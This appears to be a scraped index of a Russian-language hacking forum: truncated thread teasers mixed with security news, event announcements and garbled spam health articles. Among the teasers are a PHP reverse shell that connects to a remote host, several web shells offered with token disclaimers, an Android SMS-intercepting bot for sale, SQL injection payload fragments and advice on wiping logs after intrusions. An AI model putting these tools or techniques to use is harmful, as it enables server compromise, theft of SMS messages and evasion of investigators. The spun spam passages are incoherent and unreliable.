Зачистка следов в боевой обстановке

Зачистка следов в боевой обстановке Всем привет! В этой статье, я хочу рассказать о логах в ОС Linux и необходимости очистки логов в боевой обстановке, например, во время взлома пен-теста или вардрайвинга. Содержание Введение 1. Логи в Linux 2. Очистка лог файлов 3. Wardriver Log Cleaner 4...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

P.A.S. (php web-shell)

P.A.S. v.3.0.x Возможности : - Авторизация по кукам. - Шифрование шелла по вашему паролю сразу при скачивании. - Файловый менеджер : групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий. переименование и создание файлов и директорий. правка, просмотр, изменении...

Cfm Shell v3.0 edition

Данная утилита предназначенна для системных администраторов для удаленного управления своим сервером. Любое незаконное использование скрипта преследуется по закону. last update: 14.04.2013 14:06 Что может: Server IP Client IP Gateway Interface Server Name Server Protocol Server Software Appserver...

Retrieving all tables and their columns at once MSSQL

In the Name of ALLAH the Most Beneficent and the Merciful Zenodermus, Ch3rn0by1 and Me was workinn on MSSQL.. when Zenodermus thought to make a DIOS for MSSQL.. previously at Код: http://websec.ca/kb/sqlinjection DIOS is under the heading Retrieving Multiple Tables and Columns Код: AND 1=0; BEGIN...

Burp Suite Tutorial

Ребята из bugcrowd начали записывать видео-руководство по использованию программы Burp Suite Видео ENG: Hacking with Burp Suite - Tutorial 1 Вопросы по курсу...

SecuriTeam Secure Disclosure

Hi all, In the past 10 years Beyond Security runs a vulnerability disclosure program called SecurTeam Secure Disclosure SSD. We are looking to acquire high end vulnerabilities in various stages of research, PoC and similar. We also runs Hack2Win online competition. Hack2Win online is a hacking...

Деанонимизация пользователей Darknet(TOR, i2p(d), etc) & SOX &VPN аудиозакладками

Вообщем то ссылка на 33с3 уже была запощена в основном топике, но я хотел бы акцентировать общее внимание на презентацию Talking Behind Your Back On the Privacy & Security of the Ultrasound Tracking Ecosystem от Vasilios Mavroudis и Federico Maggi. Вкратце, суть такова: В 2012 году была основана...

Работа по всей территории РФ

НАБИРАЕМ ПЕРСОНАЛ - Возможность зарабатывать от 5000 рублей в день. - График работы гибкий. - Выплаты стабильно, без задержек - еженедельно. - Предоставляем помощь в переезде при необходимости - Приём на работу строго от 18 лет По вопросам трудоустройства пишите НАШИ КОНТАКТЫ: Telegram:...

Реверс и отладка x64 [win]

Всем привет! В этой статье я хочу рассказать об инструментальных средствах отладки 64-х битных приложений под Windows, а именно об IDA Pro. Не будет долгих речей и вступлений, перейдём сразу к делу. При реверсе 32-х битных приложений, реверсеру предоставляется богатый выбор инструментальных...

В сеть выложена база данных carder.pro

По данным портала Carder.pw и ряда пользователей Carder.pro база данных форума была выложена в публичный доступ еще в начале мая. Это произошло в результате инцидента при смене хостинга порталом. В ходе действий украинских оперативников по слежке за форумом киберпреступников произошла утечка...

Java Faces Miniwebshell

Всем привет, немного посмотрел java server faces. Если у вас есть возможнось загрузить shell.xhtml и как-то проинклудить его, то вот небольшой вебшелл. Соус в том, что мы не можем создавать переменные или что-то куда-то нормально присваивать. Но можем вызывать стейтменты, подгружать классы и в...

Один сервер, Tor и Bitcoin

Всем доброго времени суток. В последнее время достаточно много новостей о Tor и Bitcoin, обе системы в достаточной мере направлены на безопасность и анонимность, однако их преимущества могут одновременно стать и недостатками. Структура Tor не позволяет определять местоположение клиента и сервера,...

Атаки через Request-Path + Баги IE

На эту тему скоро будет статейка на пару страниц прим. Хакер, апрель 2013. Идея ужасно банальная, но результат тестирования очень удивил + обнаружены интересные баги. Зачастую при тестировании забывают, что небезопасно могут обрабатываться не только Get/Post/Cookie параметры, но и Request-URI /...

Встреча Defcon Moscow #9

3 июля, в пятницу, в офисе Mail.Ru Group состоится девятая встреча Defcon Moscow, которую организует группа DC7499. Defcon Moscow — это открытое и независимое сообщество технических энтузиастов, приближенных к области высоких технологий, а также информационной и технической безопасности. Программ...

Tor-маршрутизатор Anonabox

Tor-маршрутизатор Anonabox задолго до завершения кампании на Кикстартере собрал необходимое число заказов. Более того, устройство стоимостью $45 намного перевыполнило «план». Вместо необходимых $7500 на эту минуту собрано уже $215 000 прим.м99.: сегодня собрано уже $604,386. И это только за первы...

WSO manager edition 1.0

Сделан на основе WSO manager на файлах | WSO web-shells manager edition files - no MySql & etc. Данная утилита предназначенна для системных администраторов для удаленного управления своими серверами. Любое незаконное использование скрипта преследуется по закону. было: 1. Добавление шеллов по...

Взлом Hacking Team

В рунете тишина, давайте обсудим. Цитата: @cBekrar: I think I've spotted the name of the guy who sold the Windows Kernel EoP 0day to Hackingteam, 25K EUR is a decent price. --- Я думал все куда лучше, а тут директор vupen пишет, что это decent price...

Скайполомка - изучаем механизмы авторизации Skype

Вступление Изначально была задача «Нужен брут под Skype», потом было море интереснейшего геморроя и открытий. А сейчас перерыв перед последним рывком в реализации и я решил написать эту статью. Пусть будет больше софта хорошего и «разного», а то обделен им наш любимый SkypeTM. Хочу быстро и не...

MySQL: новый Geometric error-based

Привет! я не говорю России, так что я собираюсь объяснить это на английском языке. earlier today, i got some spare time, and played a little with the function GeometryCollection. basically, this function constructs geometry collection. sounds nice. but the interesting part is, we can only use it...

Название Бота Stepa

Возможности Бота + Админ панель Защита от DDos; + Отправка, перехват и удаление СМС-сообщений; + Отображение ботов по категория; + Есть удобная система событий для каждого бота; + Удобный вывод СМС сообщений в диалоге; + Автокрипт apk через api + Отдельная услуга; + Смена и подмена...

Hehdirb

Выложил недавно поделие для пайплайн-дирбастинга. Ссылка: В силу криворукости правильно обрабатываю не все эксепшны и не очень правильно работаю с gevent, но в таком виде на многих хостах тоже выжимает сильно больше, чем обычный dirbuster. Тулза может сама бинарным поиском определить максимальное...

Третья конференция r0 Crew

Всем доброго времени суток! Рады сообщить, что 23.05.2015 состоится третья конференция форума reverse4you.org R0-Crew Conference. Основная тематика конференции: Реверс-инжиниринг. Низкоуровневое программирование. Поиск уязвимостей. Место проведения осталось прежним, это учебный центр «Славутич»...

Russia Security Newsline или новости о безопасности по-русски

Начинаем наполнять форум жизнью, а какая может быть жизнь без общения, новостей и статьей ? Правильно, форум загнется. И если с первым особых проблем нет, хоть и мало этого общения, то с новостями совсем уж нечего просмотреть хотя достаточное ли кол-во читает их на форумах, обсосанные и не свежие...

Okinawa Night Life by Hiromi Tso

Well, there we were once because similar position and decided we we will make the effort required to uncover the strategies to the complete thing you would like. It can almost appear to be an impossible task while wading with the incredible levels of false advertising, bull crap claims and merely...

ZeroNights 2014: запретных тем нет

ZeroNights 2014: запретных тем нет До старта конференции ZeroNights 2014 остается совсем немного времени. Скоро площадка для встречи специалистов-практиков по ИБ, исследователей, программистов, звезд хакерского мира, да и просто хороших друзей и знакомых откроет свои двери навстречу новому. В это...

Вышла операционная система OpenWrt 14.07

Встроенная операционная система OpenWrt обновилась до версии 14.07. Эту ОС часто устанавливают на маршрутизаторах как замену проприетарным прошивкам. Основные компоненты OpenWrt включают в себя ядро Linux, util-linux, uClibc и BusyBox. Размер всех компонентов минимизирован, чтобы работать на...

Инъекция в ORDER BY: Второе дыхание

Почему-то у многих людей сложилось мнение, что инъекция в order by раскручивается или через time-based, или как boolean-based. Но, это совсем не так. INTRO ORDER BY употребляется для сортировки выборки по одной или несколькими колонками обычно по возрастанию или убыванию, но не только: PHP код:...

PHDays 2013 hackquest

Кто еще не в курсе, вот здесь: hackquest.phdays.com розыгрываются 20 билетов и 20 фирменных футболок PHDays 2013, который пройдет в Москве 23-24 мая Всем удачи!...

K-Shell by kikicoco VHS version 1.2 edition (.aspx)

Данная утилита предназначенна для системных администраторов для удаленного управления своим сервером. Любое незаконное использование скрипта преследуется по закону. last update: 06.05.2013 21:20 Что может: Wso-style Server IP Client IP HostName Username OS Version IIS Version System Dir...

MySQL: Обход фильтрации символов в имени колонок

Прим.: Вариант, который потерялся, и о котором никто не напомнил: https://rdot.org/forum/showpost.php?...2&postcount=10 Материал ниже все равно может быть полезен при изучении специфических SQL-запросов в MySQL и при некоторых типах WAF. ------------ Недавно, изучая одну уязвимость возникла...

LAVABIT is back with DARKMAIL

Знаменитый сервис lavabit возвращается 20.01.2017, разработав новую систему DARKMAIL...

[Кодинг] Основы низкоуровневой оптимизации

Примеры, описанные в статье, носят исключительно академический характер. Всем привет. Хотелось бы рассказать об основах этого нелегкого, но интереснейшего занятия. В качестве рабочего инструмента я буду использовать язык программирования C++, а конкретнее — компилятор g++. Так как само название...

Проверь Badoo на прочность! Месяц поиска уязвимостей

Цитата: Компания Badoo, вслед за своими коллегами ― крупнейшими представителями IT-индустрии, такими как Google, Facebook и Яндекс, начинает платить за найденные уязвимости. Мы объявляем конкурс «Проверь Badoo на прочность!», который стартует 19 марта и продлится ровно месяц. Участвовать в конкур...

ООН внедряет механизм "шпионажа" за пользователями Сети

На Всемирной конференции по международной электросвязи ВКМЭ 2012 был утвержден стандарт по применению технологии DPI Deep Packet Inspection. Если этот инструмент действительно будет внедрен, конфиденциальность многих пользователей может оказаться под угрозой, пишет CNET. ООН внедряет механизм...

PostgreSQL SQL Injection

SQL-Injection в PostgreSQL ::Ошибки:: Итак, мы подставили в параметр кавычку, и что мы видим? Вот типичные ошибки, с которыми мы будем работать: Код: Warning: pgquery: Query failed: ERROR: syntax error at or near "" at character... Warning: pgexec function.pg-exec: Query failed: ERROR: syntax...

Люди готовы "на всё" ради бесплатного WiFi

Специалисты из компаний F-Secure, Британского института по информационной безопасности и немецкой компании SySS провели совместное исследование, насколько обычные пользователи готовы подключаться к бесплатному хотспоту, даже если это подключение представляет потенциальную опасность. Для проверки,...

The Quickest Way to Proteine Mass - How To Increase Your Mass Naturally

Many reasons causing obesity in todays lifestyles, people always blame increasing rates of obesity high-calorie diet, popular array of refined foods, lack of exercise and modern it truly is generally excessive pressure and lots of additional factors. Some other things might soon be put into this...

PHP: Теория выражений

Всем привет! Сегодня хотелось бы поговорить о выражениях; о том, что они из себя представляют. Нет, это не невнятная публикация представляющая из себя выдержки c манов и ссылки. Сначала небольшой экскурс, а затем, новая и полезная информация. Примечание: Если у вас отключен тег img, перейдите на...

MySQL: Вытягивание записей в строку с использованием встроенной функции insert

Все вы знаете о выводе колонок MySQL таблицы в одну строку, итак, встречаем - Четвертый метод! Но об этом немного позже, а сейчас вспомним то, что имеется на сегодняшний день. Из статьи Dr.Z3r0: MySQL SQL Injection полный FAQ: 1. groupconcat + Простое использование, небольшой размер - Ограничение...

Хакеры «украли» Рождество у геймеров Xbox Live и PlayStation

Настоящему геймеру нет ничего приятнее, чем в новогоднюю/рождественскую ночь уединиться с игровой приставкой и оторваться по полной, когда все вокруг радуются смене последнего разряда в номере года. К сожалению, в этом году хакерская группа Lizard Squad подложила геймерам большую свинью, испортил...

MySQL: Альтернативные error-based векторы

Всем привет! Шокирующая рубрика продолжается, а значит придется вновь делать невозможное! Сегодня на повестке дня альтернативные error-based векторы. Это очень важная и актуальная тема. Об одном из них сейчас я хотел бы рассказать поподробнее. Буду краток, вектор основывается на ошибке переполнен...

[Firefox] убираем кодирование кавычек в URL | Firefox URL quote encoding patch

See next post for English description! Патч призван устранить кодирование кавычек ',", в HTTP запросах. Начиная с версии 3.0 коммит, Firefox стал урл-кодировать одинарную кавычку ' в %27. Данное поведение нередко может помешать обнаружить SQL инъекцию в веб-приложениях, например, при участии...

bash и ядро Linux в windows 10 anniversary update

Тут на днях 2 Августа подъехало новое обновление для Windows 10 "anniversary update" так вот самый интересной фишкой мне кажется будет bash в окнах. Обновление пока что доступно не всем регионам. По умолчанию bash не "включен". Если у вас версия ОС выше 1511 значит вы обладатель данного обновлени...

Google запустил собственный сервис слежения за Санта-Клаусом!

Google запустила сервис, который позволит следить за перемещениями саней Санта-Клауса в католический сочельник 24 декабря. Об этом компания сообщила в своем блоге. С помощью сервиса, который получил название Santa Tracker, можно будет узнать, в каком городе находится Санта-Клаус, куда он поедет...

tcp(port&seq) backdoor

Автор: slashd Что это? Реализации скрытого канала передачи данных на сервер с помощью стандартных полейв нашем случае поля SEQ и Source Port TCP-заголовка. Теоритическая часть. Реализовать скрытую передачу данных с помощью TCP-заголовка можно несколькими способами. Клиентхакер иницирующий...

Best tips :: HCG Game cheats Drops - Avoid Expensive Injections

As menopause decreases the degrees of estrogen, it ought to come as no real surprise more and more fat are going to be deposited around the entire body and particularly from the abdominal area. The metabolism will suffer too, causing excess weight gain and reduced vitality. While every one of the...

Основатель компании McAfee попросил убежища в Гватемале

Основатель компании McAfee Джон Макафи, которого подозревают в убийстве своего соседа в Белизе, попросил убежища в Гватемале. Об этом сообщает Agence France-Presse со ссылкой на адвоката Макафи. Как сообщил адвокат Телесфоро Гуэрра, которого Макафи нанял в Гватемале, его подзащитный пересек грани...

Перенос таблицы импорта

Всем привет! В этой статье я расскажу о работе с исполняемыми файлами PE-формата, а именно о работе с таблицей импорта. Возникла необходимость перенести таблицу импорта. Перенести в другую секцию, либо в пределах одной секции. В данном случае перенос таблицы импорта осуществляется в пределах одно...

ОБНОВИ Firefox СЕЙЧАС!

На всякий случай создам, для тех кто не следит за новостями и отключил автообновы. Дырка позволяет сливать файлы с HDD, эксплуатируется уже больше недели. Возможно, вас уже взломали. Имеет смысл вытащить маску файлов из JS и просканить свой винт, посмотреть - было ли что важное в найденных файлах...